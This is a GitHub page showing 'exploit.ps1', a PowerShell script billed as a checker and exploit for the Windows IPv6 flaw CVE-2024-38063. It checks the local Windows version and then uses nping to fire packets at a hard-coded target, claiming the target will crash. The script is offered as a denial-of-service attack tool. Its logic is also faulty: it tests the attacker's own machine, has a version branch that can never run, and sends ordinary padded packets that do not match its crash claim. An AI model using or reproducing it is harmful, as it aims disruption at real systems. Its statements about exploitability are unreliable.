-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.ps1
64 lines (53 loc) · 2.42 KB
/
exploit.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# CVE-2024-38063 Vulnerability Checker and Exploit
# Powershell Version
# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Exploit
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
$minVersion = [Version]"10.0.26100.1457"
$serverMinVersion = [Version]"10.0.17763.6189"
# Get current OS Version
$osVersion = [System.Environment]::OSVersion.Version
# Function to check if the system is vulnerable
function Check-Vulnerability {
if ($osVersion -lt $minVersion) {
Write-Host "[+] Your Windows 10/11 system may be vulnerable to CVE-2024-38063."
return $true
} elseif ($osVersion -lt $serverMinVersion) {
Write-Host "[+] Your Windows Server system may be vulnerable to CVE-2024-38063."
return $true
} else {
Write-Host "[-] Your system appears to be up-to-date and not vulnerable."
return $false
}
}
# Function to exploit the vulnerability by sending crafted packets
# Placeholder for using an external tool like nping
function Exploit-Vulnerability {
param (
[string]$DestinationIP,
[string]$DestinationMAC
)
Write-Host "[+] Starting the exploit against $DestinationIP..."
# Craft packets using nping (part of nmap) for the exploit
# nping command for simulating crafted IPv6 packets
$npingCommand = "nping --ipv6 -c 5 --dest-mac $DestinationMAC -p 80 --data-length 1200 --raw-ipv6 $DestinationIP"
Write-Host "[i] Executing: $npingCommand"
# Execute the nping command to send crafted IPv6 packets
Start-Process -FilePath "cmd.exe" -ArgumentList "/c", $npingCommand -NoNewWindow -Wait
Write-Host "[+] Exploit attempt complete. Check if the target is down (BSOD or crash should occur after 60 seconds)."
}
# Main Execution Flow
$dstIP = "fe80::78b7:6283:49ad:c565" # Target IPv6 address (replace with actual target)
$dstMAC = "00:0C:29:55:E1:C8" # Target MAC address (replace with actual target)
# Step 1: Check if the system is vulnerable
$vulnerable = Check-Vulnerability
# Step 2: If vulnerable, ask if the user wants to exploit
if ($vulnerable) {
$exploit = Read-Host "[?] Do you want to continue with the exploit? (Y/N)"
if ($exploit -eq "Y") {
Exploit-Vulnerability -DestinationIP $dstIP -DestinationMAC $dstMAC
} else {
Write-Host "[-] Exploit aborted by user."
}
} else {
Write-Host "[-] System is not vulnerable, no exploit will be executed."
}